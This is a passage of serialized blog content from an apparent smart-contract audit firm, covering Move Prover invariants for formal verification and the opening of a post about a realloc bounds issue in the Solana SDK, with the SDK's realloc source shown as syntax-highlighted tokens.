":12552},{"type":28,"tag":116,"props":12591,"children":12592},{"style":266},[12593],{"type":33,"value":7282},{"type":28,"tag":116,"props":12595,"children":12596},{"style":272},[12597],{"type":33,"value":12561},{"type":28,"tag":116,"props":12599,"children":12600},{"style":266},[12601],{"type":33,"value":12602},", signer",{"type":28,"tag":116,"props":12604,"children":12605},{"style":370},[12606],{"type":33,"value":3151},{"type":28,"tag":116,"props":12608,"children":12609},{"style":282},[12610],{"type":33,"value":6881},{"type":28,"tag":116,"props":12612,"children":12613},{"style":266},[12614],{"type":33,"value":313},{"type":28,"tag":116,"props":12616,"children":12617},{"style":272},[12618],{"type":33,"value":12619},"account",{"type":28,"tag":116,"props":12621,"children":12622},{"style":266},[12623],{"type":33,"value":1929},{"type":28,"tag":116,"props":12625,"children":12626},{"class":245,"line":614},[12627,12631,12635,12639,12643,12647,12651,12655,12659,12663],{"type":28,"tag":116,"props":12628,"children":12629},{"style":272},[12630],{"type":33,"value":7859},{"type":28,"tag":116,"props":12632,"children":12633},{"style":370},[12634],{"type":33,"value":12530},{"type":28,"tag":116,"props":12636,"children":12637},{"style":272},[12638],{"type":33,"value":6376},{"type":28,"tag":116,"props":12640,"children":12641},{"style":266},[12642],{"type":33,"value":514},{"type":28,"tag":116,"props":12644,"children":12645},{"style":339},[12646],{"type":33,"value":12543},{"type":28,"tag":116,"props":12648,"children":12649},{"style":266},[12650],{"type":33,"value":514},{"type":28,"tag":116,"props":12652,"children":12653},{"style":339},[12654],{"type":33,"value":12552},{"type":28,"tag":116,"props":12656,"children":12657},{"style":266},[12658],{"type":33,"value":6398},{"type":28,"tag":116,"props":12660,"children":12661},{"style":272},[12662],{"type":33,"value":12561},{"type":28,"tag":116,"props":12664,"children":12665},{"style":266},[12666],{"type":33,"value":895},{"type":28,"tag":116,"props":12668,"children":12669},{"class":245,"line":631},[12670,12674,12678,12682,12687,12691,12696,12700,12704,12708,12712,12716,12720,12724,12728],{"type":28,"tag":116,"props":12671,"children":12672},{"style":272},[12673],{"type":33,"value":7859},{"type":28,"tag":116,"props":12675,"children":12676},{"style":272},[12677],{"type":33,"value":8828},{"type":28,"tag":116,"props":12679,"children":12680},{"style":370},[12681],{"type":33,"value":2953},{"type":28,"tag":116,"props":12683,"children":12684},{"style":282},[12685],{"type":33,"value":12686}," old",{"type":28,"tag":116,"props":12688,"children":12689},{"style":266},[12690],{"type":33,"value":313},{"type":28,"tag":116,"props":12692,"children":12693},{"style":272},[12694],{"type":33,"value":12695},"global",{"type":28,"tag":116,"props":12697,"children":12698},{"style":266},[12699],{"type":33,"value":514},{"type":28,"tag":116,"props":12701,"children":12702},{"style":339},[12703],{"type":33,"value":12543},{"type":28,"tag":116,"props":12705,"children":12706},{"style":266},[12707],{"type":33,"value":514},{"type":28,"tag":116,"props":12709,"children":12710},{"style":339},[12711],{"type":33,"value":12552},{"type":28,"tag":116,"props":12713,"children":12714},{"style":266},[12715],{"type":33,"value":6398},{"type":28,"tag":116,"props":12717,"children":12718},{"style":272},[12719],{"type":33,"value":12561},{"type":28,"tag":116,"props":12721,"children":12722},{"style":266},[12723],{"type":33,"value":1829},{"type":28,"tag":116,"props":12725,"children":12726},{"style":370},[12727],{"type":33,"value":141},{"type":28,"tag":116,"props":12729,"children":12730},{"style":266},[12731],{"type":33,"value":12732},"offered);\n",{"type":28,"tag":116,"props":12734,"children":12735},{"class":245,"line":665},[12736],{"type":28,"tag":116,"props":12737,"children":12738},{"style":266},[12739],{"type":33,"value":3025},{"type":28,"tag":29,"props":12741,"children":12742},{},[12743],{"type":33,"value":12744},"These access control specifications make it impossible to accidentally remove security critical access control policies later.",{"type":28,"tag":75,"props":12746,"children":12748},{"id":12747},"complex-mathematical-formulae",[12749],{"type":33,"value":12750},"Complex Mathematical Formulae",{"type":28,"tag":29,"props":12752,"children":12753},{},[12754,12756,12761],{"type":33,"value":12755},"Whether it's a decimal implementation or more complex data structures, it's often useful to verify that the expected output is ",{"type":28,"tag":2583,"props":12757,"children":12758},{},[12759],{"type":33,"value":12760},"always",{"type":33,"value":12762}," the output.",{"type":28,"tag":29,"props":12764,"children":12765},{},[12766],{"type":33,"value":12767},"Proving that your fundamental data structures work exactly as intended will give you much more confidence in the remainder of your codebase.",{"type":28,"tag":29,"props":12769,"children":12770},{},[12771,12773,12780],{"type":33,"value":12772},"For example, in our work with ",{"type":28,"tag":87,"props":12774,"children":12777},{"href":12775,"rel":12776},"https://laminar.markets/",[91],[12778],{"type":33,"value":12779},"Laminar Markets",{"type":33,"value":12781},", we provided recommendations for verifying their internal splay tree implementation against a simpler priority queue data structure.",{"type":28,"tag":75,"props":12783,"children":12785},{"id":12784},"data-invariants",[12786],{"type":33,"value":12787},"Data Invariants",{"type":28,"tag":29,"props":12789,"children":12790},{},[12791,12793,12799,12801,12807,12809,12815,12817,12823],{"type":33,"value":12792},"Formal verification provides the best environment to verify that certain ",{"type":28,"tag":98,"props":12794,"children":12796},{"className":12795},[],[12797],{"type":33,"value":12798},"variables",{"type":33,"value":12800}," or ",{"type":28,"tag":98,"props":12802,"children":12804},{"className":12803},[],[12805],{"type":33,"value":12806},"resources",{"type":33,"value":12808}," don't exceed the intended boundaries. Let's consider the struct from below. We can ensure that ",{"type":28,"tag":98,"props":12810,"children":12812},{"className":12811},[],[12813],{"type":33,"value":12814},"index",{"type":33,"value":12816}," is never greater than 4 using a ",{"type":28,"tag":98,"props":12818,"children":12820},{"className":12819},[],[12821],{"type":33,"value":12822},"struct invariant",{"type":33,"value":141},{"type":28,"tag":234,"props":12825,"children":12827},{"code":12826,"language":2651,"meta":7,"className":2652,"style":7},"struct Type {\n    index: u64\n}\n\nspec Type {\n    invariant index \u003C 4;\n}\n",[12828],{"type":28,"tag":98,"props":12829,"children":12830},{"__ignoreMap":7},[12831,12847,12864,12871,12878,12893,12917],{"type":28,"tag":116,"props":12832,"children":12833},{"class":245,"line":246},[12834,12838,12843],{"type":28,"tag":116,"props":12835,"children":12836},{"style":376},[12837],{"type":33,"value":9069},{"type":28,"tag":116,"props":12839,"children":12840},{"style":339},[12841],{"type":33,"value":12842}," Type",{"type":28,"tag":116,"props":12844,"children":12845},{"style":266},[12846],{"type":33,"value":1291},{"type":28,"tag":116,"props":12848,"children":12849},{"class":245,"line":256},[12850,12855,12859],{"type":28,"tag":116,"props":12851,"children":12852},{"style":272},[12853],{"type":33,"value":12854},"    index",{"type":28,"tag":116,"props":12856,"children":12857},{"style":370},[12858],{"type":33,"value":4160},{"type":28,"tag":116,"props":12860,"children":12861},{"style":339},[12862],{"type":33,"value":12863}," u64\n",{"type":28,"tag":116,"props":12865,"children":12866},{"class":245,"line":293},[12867],{"type":28,"tag":116,"props":12868,"children":12869},{"style":266},[12870],{"type":33,"value":406},{"type":28,"tag":116,"props":12872,"children":12873},{"class":245,"line":361},[12874],{"type":28,"tag":116,"props":12875,"children":12876},{"emptyLinePlaceholder":19},[12877],{"type":33,"value":1044},{"type":28,"tag":116,"props":12879,"children":12880},{"class":245,"line":387},[12881,12885,12889],{"type":28,"tag":116,"props":12882,"children":12883},{"style":272},[12884],{"type":33,"value":7947},{"type":28,"tag":116,"props":12886,"children":12887},{"style":339},[12888],{"type":33,"value":12842},{"type":28,"tag":116,"props":12890,"children":12891},{"style":266},[12892],{"type":33,"value":1291},{"type":28,"tag":116,"props":12894,"children":12895},{"class":245,"line":400},[12896,12900,12905,12909,12913],{"type":28,"tag":116,"props":12897,"children":12898},{"style":272},[12899],{"type":33,"value":7964},{"type":28,"tag":116,"props":12901,"children":12902},{"style":272},[12903],{"type":33,"value":12904}," index",{"type":28,"tag":116,"props":12906,"children":12907},{"style":370},[12908],{"type":33,"value":8391},{"type":28,"tag":116,"props":12910,"children":12911},{"style":350},[12912],{"type":33,"value":11413},{"type":28,"tag":116,"props":12914,"children":12915},{"style":266},[12916],{"type":33,"value":384},{"type":28,"tag":116,"props":12918,"children":12919},{"class":245,"line":614},[12920],{"type":28,"tag":116,"props":12921,"children":12922},{"style":266},[12923],{"type":33,"value":406},{"type":28,"tag":29,"props":12925,"children":12926},{},[12927,12929,12936,12937,12943],{"type":33,"value":12928},"We were able to verify more complex properties in our recent audits for ",{"type":28,"tag":87,"props":12930,"children":12933},{"href":12931,"rel":12932},"https://layerzero.network/",[91],[12934],{"type":33,"value":12935},"LayerZero",{"type":33,"value":10659},{"type":28,"tag":87,"props":12938,"children":12941},{"href":12939,"rel":12940},"http://ariesmarkets.xyz/",[91],[12942],{"type":33,"value":6462},{"type":33,"value":12944},", but the details are left as an exercise to the reader.",{"type":28,"tag":75,"props":12946,"children":12948},{"id":12947},"economic-invariants",[12949],{"type":33,"value":12950},"Economic Invariants.",{"type":28,"tag":29,"props":12952,"children":12953},{},[12954],{"type":33,"value":12955},"Proper economic invariants can require more creativity to come up with but can be extremely effective at securing your protocol.",{"type":28,"tag":29,"props":12957,"children":12958},{},[12959],{"type":33,"value":12960},"For example, you should never be able to drain coins from a pool by adding and removing shares. In practice, you might implement this as a utility helper function.",{"type":28,"tag":234,"props":12962,"children":12963},{"code":7639,"language":2651,"meta":7,"className":2652,"style":7},[12964],{"type":28,"tag":98,"props":12965,"children":12966},{"__ignoreMap":7},[12967,12974,13057,13096,13115,13122,13137,13160,13183,13206],{"type":28,"tag":116,"props":12968,"children":12969},{"class":245,"line":246},[12970],{"type":28,"tag":116,"props":12971,"children":12972},{"style":250},[12973],{"type":33,"value":7651},{"type":28,"tag":116,"props":12975,"children":12976},{"class":245,"line":256},[12977,12981,12985,12989,12993,12997,13001,13005,13009,13013,13017,13021,13025,13029,13033,13037,13041,13045,13049,13053],{"type":28,"tag":116,"props":12978,"children":12979},{"style":272},[12980],{"type":33,"value":6241},{"type":28,"tag":116,"props":12982,"children":12983},{"style":282},[12984],{"type":33,"value":7663},{"type":28,"tag":116,"props":12986,"children":12987},{"style":266},[12988],{"type":33,"value":313},{"type":28,"tag":116,"props":12990,"children":12991},{"style":272},[12992],{"type":33,"value":7672},{"type":28,"tag":116,"props":12994,"children":12995},{"style":370},[12996],{"type":33,"value":4160},{"type":28,"tag":116,"props":12998,"children":12999},{"style":339},[13000],{"type":33,"value":5531},{"type":28,"tag":116,"props":13002,"children":13003},{"style":266},[13004],{"type":33,"value":825},{"type":28,"tag":116,"props":13006,"children":13007},{"style":272},[13008],{"type":33,"value":7689},{"type":28,"tag":116,"props":13010,"children":13011},{"style":370},[13012],{"type":33,"value":4160},{"type":28,"tag":116,"props":13014,"children":13015},{"style":339},[13016],{"type":33,"value":5531},{"type":28,"tag":116,"props":13018,"children":13019},{"style":266},[13020],{"type":33,"value":1829},{"type":28,"tag":116,"props":13022,"children":13023},{"style":370},[13024],{"type":33,"value":4160},{"type":28,"tag":116,"props":13026,"children":13027},{"style":266},[13028],{"type":33,"value":269},{"type":28,"tag":116,"props":13030,"children":13031},{"style":339},[13032],{"type":33,"value":7714},{"type":28,"tag":116,"props":13034,"children":13035},{"style":266},[13036],{"type":33,"value":825},{"type":28,"tag":116,"props":13038,"children":13039},{"style":339},[13040],{"type":33,"value":7714},{"type":28,"tag":116,"props":13042,"children":13043},{"style":266},[13044],{"type":33,"value":1609},{"type":28,"tag":116,"props":13046,"children":13047},{"style":272},[13048],{"type":33,"value":6015},{"type":28,"tag":116,"props":13050,"children":13051},{"style":339},[13052],{"type":33,"value":7735},{"type":28,"tag":116,"props":13054,"children":13055},{"style":266},[13056],{"type":33,"value":1291},{"type":28,"tag":116,"props":13058,"children":13059},{"class":245,"line":293},[13060,13064,13068,13072,13076,13080,13084,13088,13092],{"type":28,"tag":116,"props":13061,"children":13062},{"style":376},[13063],{"type":33,"value":7747},{"type":28,"tag":116,"props":13065,"children":13066},{"style":272},[13067],{"type":33,"value":7752},{"type":28,"tag":116,"props":13069,"children":13070},{"style":370},[13071],{"type":33,"value":2226},{"type":28,"tag":116,"props":13073,"children":13074},{"style":282},[13075],{"type":33,"value":7761},{"type":28,"tag":116,"props":13077,"children":13078},{"style":266},[13079],{"type":33,"value":313},{"type":28,"tag":116,"props":13081,"children":13082},{"style":272},[13083],{"type":33,"value":7672},{"type":28,"tag":116,"props":13085,"children":13086},{"style":266},[13087],{"type":33,"value":825},{"type":28,"tag":116,"props":13089,"children":13090},{"style":272},[13091],{"type":33,"value":7689},{"type":28,"tag":116,"props":13093,"children":13094},{"style":266},[13095],{"type":33,"value":895},{"type":28,"tag":116,"props":13097,"children":13098},{"class":245,"line":361},[13099,13103,13107,13111],{"type":28,"tag":116,"props":13100,"children":13101},{"style":282},[13102],{"type":33,"value":7789},{"type":28,"tag":116,"props":13104,"children":13105},{"style":266},[13106],{"type":33,"value":313},{"type":28,"tag":116,"props":13108,"children":13109},{"style":272},[13110],{"type":33,"value":7798},{"type":28,"tag":116,"props":13112,"children":13113},{"style":266},[13114],{"type":33,"value":2830},{"type":28,"tag":116,"props":13116,"children":13117},{"class":245,"line":387},[13118],{"type":28,"tag":116,"props":13119,"children":13120},{"style":266},[13121],{"type":33,"value":5543},{"type":28,"tag":116,"props":13123,"children":13124},{"class":245,"line":400},[13125,13129,13133],{"type":28,"tag":116,"props":13126,"children":13127},{"style":272},[13128],{"type":33,"value":7817},{"type":28,"tag":116,"props":13130,"children":13131},{"style":272},[13132],{"type":33,"value":7663},{"type":28,"tag":116,"props":13134,"children":13135},{"style":266},[13136],{"type":33,"value":1291},{"type":28,"tag":116,"props":13138,"children":13139},{"class":245,"line":614},[13140,13144,13148,13152,13156],{"type":28,"tag":116,"props":13141,"children":13142},{"style":272},[13143],{"type":33,"value":7833},{"type":28,"tag":116,"props":13145,"children":13146},{"style":272},[13147],{"type":33,"value":7838},{"type":28,"tag":116,"props":13149,"children":13150},{"style":370},[13151],{"type":33,"value":373},{"type":28,"tag":116,"props":13153,"children":13154},{"style":376},[13155],{"type":33,"value":7847},{"type":28,"tag":116,"props":13157,"children":13158},{"style":266},[13159],{"type":33,"value":384},{"type":28,"tag":116,"props":13161,"children":13162},{"class":245,"line":631},[13163,13167,13171,13175,13179],{"type":28,"tag":116,"props":13164,"children":13165},{"style":272},[13166],{"type":33,"value":7859},{"type":28,"tag":116,"props":13168,"children":13169},{"style":272},[13170],{"type":33,"value":7864},{"type":28,"tag":116,"props":13172,"children":13173},{"style":370},[13174],{"type":33,"value":7869},{"type":28,"tag":116,"props":13176,"children":13177},{"style":272},[13178],{"type":33,"value":7874},{"type":28,"tag":116,"props":13180,"children":13181},{"style":266},[13182],{"type":33,"value":384},{"type":28,"tag":116,"props":13184,"children":13185},{"class":245,"line":665},[13186,13190,13194,13198,13202],{"type":28,"tag":116,"props":13187,"children":13188},{"style":272},[13189],{"type":33,"value":7859},{"type":28,"tag":116,"props":13191,"children":13192},{"style":272},[13193],{"type":33,"value":7890},{"type":28,"tag":116,"props":13195,"children":13196},{"style":370},[13197],{"type":33,"value":7869},{"type":28,"tag":116,"props":13199,"children":13200},{"style":272},[13201],{"type":33,"value":7899},{"type":28,"tag":116,"props":13203,"children":13204},{"style":266},[13205],{"type":33,"value":384},{"type":28,"tag":116,"props":13207,"children":13208},{"class":245,"line":713},[13209],{"type":28,"tag":116,"props":13210,"children":13211},{"style":266},[13212],{"type":33,"value":5543},{"type":28,"tag":29,"props":13214,"children":13215},{},[13216],{"type":33,"value":13217},"Some other ideas include",{"type":28,"tag":455,"props":13219,"children":13220},{},[13221,13226,13231],{"type":28,"tag":459,"props":13222,"children":13223},{},[13224],{"type":33,"value":13225},"Swapping through an AMM should never lead to a decrease in one side of the pool without also increasing the other side. In other words, no free money",{"type":28,"tag":459,"props":13227,"children":13228},{},[13229],{"type":33,"value":13230},"Lending protocols should always be fully collateralized after a series of deposit, borrow, and withdraw instructions.",{"type":28,"tag":459,"props":13232,"children":13233},{},[13234],{"type":33,"value":13235},"Orderbooks should never lose money after an order is placed and then canceled.",{"type":28,"tag":63,"props":13237,"children":13238},{"id":4980},[13239],{"type":33,"value":4983},{"type":28,"tag":29,"props":13241,"children":13242},{},[13243],{"type":33,"value":13244},"In this post, we've explored how to properly utilize the Move Prover to verify critical invariants about your codebase.",{"type":28,"tag":29,"props":13246,"children":13247},{},[13248],{"type":33,"value":13249},"In our upcoming posts, we will explore how to turn the Move Prover into a weapon for squashing security vulnerabilities by learning how to ask the right questions, so stay tuned!",{"type":28,"tag":29,"props":13251,"children":13252},{},[13253,13255,13260],{"type":33,"value":13254},"We're passionate about formal verification and pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me ",{"type":28,"tag":87,"props":13256,"children":13258},{"href":8909,"rel":13257},[91],[13259],{"type":33,"value":8913},{"type":33,"value":141},{"type":28,"tag":2516,"props":13262,"children":13263},{},[13264],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":13266},[13267,13268,13271,13278],{"id":8973,"depth":256,"text":8976},{"id":9027,"depth":256,"text":9030,"children":13269},[13270],{"id":9278,"depth":293,"text":9274},{"id":12176,"depth":256,"text":12179,"children":13272},[13273,13274,13275,13276,13277],{"id":12192,"depth":293,"text":12195},{"id":12442,"depth":293,"text":12445},{"id":12747,"depth":293,"text":12750},{"id":12784,"depth":293,"text":12787},{"id":12947,"depth":293,"text":12950},{"id":4980,"depth":256,"text":4983},"content:blog:2022-09-16-move-prover.md","blog/2022-09-16-move-prover.md","blog/2022-09-16-move-prover",{"_path":13283,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":13284,"description":13285,"author":13286,"image":13287,"date":13290,"isFeatured":19,"onBlogPage":19,"tags":13291,"body":13292,"_type":2534,"_id":18406,"_source":2536,"_file":18407,"_stem":18408,"_extension":2539},"/blog/2022-12-09-rust-realloc-and-references","Rust, Realloc, and References","Rust is safe.. right? Not if your dependencies are unsafe.. A deep dive into a subtle Solana SDK bug, Rust internals, and how we found it all.","ethan",{"src":13288,"height":13289,"width":18},"/posts/rust-realloc-and-references/title.jpg",512,"2022-12-09",[2552,8937],{"type":25,"children":13293,"toc":18390},[13294,13322,13342,14012,14032,14043,14055,14188,14198,14204,14230,14568,14613,14939,15002,15015,15088,15156,15177,15190,15204,15551,15562,15567,15698,15749,15775,15787,15960,16096,16137,16174,16240,16245,16283,16337,16348,16491,16503,16509,16515,16548,16562,16683,16702,16730,16736,16826,16917,16923,16928,16975,17244,17319,17330,17357,17689,17701,17774,18047,18084,18386],{"type":28,"tag":29,"props":13295,"children":13296},{},[13297,13299,13305,13307,13312,13314,13320],{"type":33,"value":13298},"It all started with an audit of a program that used ",{"type":28,"tag":98,"props":13300,"children":13302},{"className":13301},[],[13303],{"type":33,"value":13304},"realloc",{"type":33,"value":13306}," on an account, without any bounds checks on the new size allowed. It seemed like the developers assumed that if the new size was too large, the ",{"type":28,"tag":98,"props":13308,"children":13310},{"className":13309},[],[13311],{"type":33,"value":13304},{"type":33,"value":13313}," call (from ",{"type":28,"tag":98,"props":13315,"children":13317},{"className":13316},[],[13318],{"type":33,"value":13319},"solana_program",{"type":33,"value":13321},") would error out appropriately.",{"type":28,"tag":29,"props":13323,"children":13324},{},[13325,13327,13333,13334,13341],{"type":33,"value":13326},"But we're not ones to just assume things around here, so let's take a look at how ",{"type":28,"tag":98,"props":13328,"children":13330},{"className":13329},[],[13331],{"type":33,"value":13332},"AccountInfo::realloc",{"type":33,"value":5172},{"type":28,"tag":87,"props":13335,"children":13338},{"href":13336,"rel":13337},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#124-148",[91],[13339],{"type":33,"value":13340},"implemented",{"type":33,"value":4160},{"type":28,"tag":234,"props":13343,"children":13345},{"className":2652,"code":13344,"language":2651,"meta":7,"style":7},"pub fn realloc(&self, new_len: usize, zero_init: bool) -> Result\u003C(), ProgramError> {\n    let orig_len = self.data_len();\n\n    // realloc\n    unsafe {\n        // First set new length in the serialized data\n        let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n        *ptr = new_len as u64;\n\n        // Then set the new length in the local slice\n        let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n        *ptr = new_len as u64;\n    }\n\n    // zero-init if requested\n    if zero_init && new_len > orig_len {\n        sol_memset(\n            &mut self.try_borrow_mut_data()?[orig_len..],\n            0,\n            new_len.saturating_sub(orig_len),\n        );\n    }\n\n    Ok(())\n}\n",[13346],{"type":28,"tag":98,"props":13347,"children":13348},{"__ignoreMap":7},[13349,13443,13477,13484,13492,13504,13512,13604,13637,13644,13652,13782,13813,13820,13827,13835,13869,13881,13930,13942,13971,13978,13985,13992,14005],{"type":28,"tag":116,"props":13350,"children":13351},{"class":245,"line":246},[13352,13357,13362,13367,13371,13375,13380,13384,13389,13393,13398,13402,13407,13411,13415,13419,13424,13429,13434,13439],{"type":28,"tag":116,"props":13353,"children":13354},{"style":376},[13355],{"type":33,"value":13356},"pub",{"type":28,"tag":116,"props":13358,"children":13359},{"style":376},[13360],{"type":33,"value":13361}," fn",{"type":28,"tag":116,"props":13363,"children":13364},{"style":282},[13365],{"type":33,"value":13366}," realloc",{"type":28,"tag":116,"props":13368,"children":13369},{"style":266},[13370],{"type":33,"value":313},{"type":28,"tag":116,"props":13372,"children":13373},{"style":370},[13374],{"type":33,"value":2780},{"type":28,"tag":116,"props":13376,"children":13377},{"style":376},[13378],{"type":33,"value":13379},"self",{"type":28,"tag":116,"props":13381,"children":13382},{"style":266},[13383],{"type":33,"value":825},{"type":28,"tag":116,"props":13385,"children":13386},{"style":272},[13387],{"type":33,"value":13388},"new_len",{"type":28,"tag":116,"props":13390,"children":13391},{"style":370},[13392],{"type":33,"value":4160},{"type":28,"tag":116,"props":13394,"children":13395},{"style":339},[13396],{"type":33,"value":13397}," usize",{"type":28,"tag":116,"props":13399,"children":13400},{"style":266},[13401],{"type":33,"value":825},{"type":28,"tag":116,"props":13403,"children":13404},{"style":272},[13405],{"type":33,"value":13406},"zero_init",{"type":28,"tag":116,"props":13408,"children":13409},{"style":370},[13410],{"type":33,"value":4160},{"type":28,"tag":116,"props":13412,"children":13413},{"style":339},[13414],{"type":33,"value":11718},{"type":28,"tag":116,"props":13416,"children":13417},{"style":266},[13418],{"type":33,"value":1609},{"type":28,"tag":116,"props":13420,"children":13421},{"style":370},[13422],{"type":33,"value":13423},"->",{"type":28,"tag":116,"props":13425,"children":13426},{"style":339},[13427],{"type":33,"value":13428}," Result",{"type":28,"tag":116,"props":13430,"children":13431},{"style":266},[13432],{"type":33,"value":13433},"\u003C(), ",{"type":28,"tag":116,"props":13435,"children":13436},{"style":339},[13437],{"type":33,"value":13438},"ProgramError",{"type":28,"tag":116,"props":13440,"children":13441},{"style":266},[13442],{"type":33,"value":6952},{"type":28,"tag":116,"props":13444,"children":13445},{"class":245,"line":256},[13446,13450,13455,13459,13464,13468,13473],{"type":28,"tag":116,"props":13447,"children":13448},{"style":376},[13449],{"type":33,"value":2672},{"type":28,"tag":116,"props":13451,"children":13452},{"style":272},[13453],{"type":33,"value":13454}," orig_len",{"type":28,"tag":116,"props":13456,"children":13457},{"style":370},[13458],{"type":33,"value":2226},{"type":28,"tag":116,"props":13460,"children":13461},{"style":376},[13462],{"type":33,"value":13463}," self",{"type":28,"tag":116,"props":13465,"children":13466},{"style":370},[13467],{"type":33,"value":141},{"type":28,"tag":116,"props":13469,"children":13470},{"style":282},[13471],{"type":33,"value":13472},"data_len",{"type":28,"tag":116,"props":13474,"children":13475},{"style":266},[13476],{"type":33,"value":1445},{"type":28,"tag":116,"props":13478,"children":13479},{"class":245,"line":293},[13480],{"type":28,"tag":116,"props":13481,"children":13482},{"emptyLinePlaceholder":19},[13483],{"type":33,"value":1044},{"type":28,"tag":116,"props":13485,"children":13486},{"class":245,"line":361},[13487],{"type":28,"tag":116,"props":13488,"children":13489},{"style":250},[13490],{"type":33,"value":13491},"    // realloc\n",{"type":28,"tag":116,"props":13493,"children":13494},{"class":245,"line":387},[13495,13500],{"type":28,"tag":116,"props":13496,"children":13497},{"style":376},[13498],{"type":33,"value":13499},"    unsafe",{"type":28,"tag":116,"props":13501,"children":13502},{"style":266},[13503],{"type":33,"value":1291},{"type":28,"tag":116,"props":13505,"children":13506},{"class":245,"line":400},[13507],{"type":28,"tag":116,"props":13508,"children":13509},{"style":250},[13510],{"type":33,"value":13511},"        // First set new length in the serialized data\n",{"type":28,"tag":116,"props":13513,"children":13514},{"class":245,"line":614},[13515,13519,13524,13528,13532,13536,13541,13546,13550,13555,13559,13563,13568,13572,13576,13580,13584,13588,13592,13596,13600],{"type":28,"tag":116,"props":13516,"children":13517},{"style":376},[13518],{"type":33,"value":2736},{"type":28,"tag":116,"props":13520,"children":13521},{"style":272},[13522],{"type":33,"value":13523}," ptr",{"type":28,"tag":116,"props":13525,"children":13526},{"style":370},[13527],{"type":33,"value":2226},{"type":28,"tag":116,"props":13529,"children":13530},{"style":376},[13531],{"type":33,"value":13463},{"type":28,"tag":116,"props":13533,"children":13534},{"style":370},[13535],{"type":33,"value":141},{"type":28,"tag":116,"props":13537,"children":13538},{"style":282},[13539],{"type":33,"value":13540},"try_borrow_mut_data",{"type":28,"tag":116,"props":13542,"children":13543},{"style":266},[13544],{"type":33,"value":13545},"()",{"type":28,"tag":116,"props":13547,"children":13548},{"style":370},[13549],{"type":33,"value":2803},{"type":28,"tag":116,"props":13551,"children":13552},{"style":282},[13553],{"type":33,"value":13554},"as_mut_ptr",{"type":28,"tag":116,"props":13556,"children":13557},{"style":266},[13558],{"type":33,"value":13545},{"type":28,"tag":116,"props":13560,"children":13561},{"style":370},[13562],{"type":33,"value":141},{"type":28,"tag":116,"props":13564,"children":13565},{"style":282},[13566],{"type":33,"value":13567},"offset",{"type":28,"tag":116,"props":13569,"children":13570},{"style":266},[13571],{"type":33,"value":313},{"type":28,"tag":116,"props":13573,"children":13574},{"style":370},[13575],{"type":33,"value":3996},{"type":28,"tag":116,"props":13577,"children":13578},{"style":350},[13579],{"type":33,"value":3745},{"type":28,"tag":116,"props":13581,"children":13582},{"style":266},[13583],{"type":33,"value":1609},{"type":28,"tag":116,"props":13585,"children":13586},{"style":376},[13587],{"type":33,"value":8513},{"type":28,"tag":116,"props":13589,"children":13590},{"style":370},[13591],{"type":33,"value":9484},{"type":28,"tag":116,"props":13593,"children":13594},{"style":376},[13595],{"type":33,"value":3394},{"type":28,"tag":116,"props":13597,"children":13598},{"style":339},[13599],{"type":33,"value":5531},{"type":28,"tag":116,"props":13601,"children":13602},{"style":266},[13603],{"type":33,"value":384},{"type":28,"tag":116,"props":13605,"children":13606},{"class":245,"line":631},[13607,13611,13616,13620,13625,13629,13633],{"type":28,"tag":116,"props":13608,"children":13609},{"style":370},[13610],{"type":33,"value":7423},{"type":28,"tag":116,"props":13612,"children":13613},{"style":272},[13614],{"type":33,"value":13615},"ptr",{"type":28,"tag":116,"props":13617,"children":13618},{"style":370},[13619],{"type":33,"value":2226},{"type":28,"tag":116,"props":13621,"children":13622},{"style":272},[13623],{"type":33,"value":13624}," new_len",{"type":28,"tag":116,"props":13626,"children":13627},{"style":376},[13628],{"type":33,"value":8500},{"type":28,"tag":116,"props":13630,"children":13631},{"style":339},[13632],{"type":33,"value":5531},{"type":28,"tag":116,"props":13634,"children":13635},{"style":266},[13636],{"type":33,"value":384},{"type":28,"tag":116,"props":13638,"children":13639},{"class":245,"line":665},[13640],{"type":28,"tag":116,"props":13641,"children":13642},{"emptyLinePlaceholder":19},[13643],{"type":33,"value":1044},{"type":28,"tag":116,"props":13645,"children":13646},{"class":245,"line":713},[13647],{"type":28,"tag":116,"props":13648,"children":13649},{"style":250},[13650],{"type":33,"value":13651},"        // Then set the new length in the local slice\n",{"type":28,"tag":116,"props":13653,"children":13654},{"class":245,"line":750},[13655,13659,13663,13667,13671,13675,13679,13684,13688,13692,13696,13700,13705,13710,13714,13718,13722,13726,13730,13734,13738,13742,13746,13750,13754,13758,13762,13766,13770,13774,13778],{"type":28,"tag":116,"props":13656,"children":13657},{"style":376},[13658],{"type":33,"value":2736},{"type":28,"tag":116,"props":13660,"children":13661},{"style":272},[13662],{"type":33,"value":13523},{"type":28,"tag":116,"props":13664,"children":13665},{"style":370},[13666],{"type":33,"value":2226},{"type":28,"tag":116,"props":13668,"children":13669},{"style":370},[13670],{"type":33,"value":6813},{"type":28,"tag":116,"props":13672,"children":13673},{"style":376},[13674],{"type":33,"value":3394},{"type":28,"tag":116,"props":13676,"children":13677},{"style":370},[13678],{"type":33,"value":9484},{"type":28,"tag":116,"props":13680,"children":13681},{"style":266},[13682],{"type":33,"value":13683},"(((",{"type":28,"tag":116,"props":13685,"children":13686},{"style":376},[13687],{"type":33,"value":13379},{"type":28,"tag":116,"props":13689,"children":13690},{"style":370},[13691],{"type":33,"value":141},{"type":28,"tag":116,"props":13693,"children":13694},{"style":266},[13695],{"type":33,"value":3372},{"type":28,"tag":116,"props":13697,"children":13698},{"style":370},[13699],{"type":33,"value":141},{"type":28,"tag":116,"props":13701,"children":13702},{"style":282},[13703],{"type":33,"value":13704},"as_ptr",{"type":28,"tag":116,"props":13706,"children":13707},{"style":266},[13708],{"type":33,"value":13709},"() 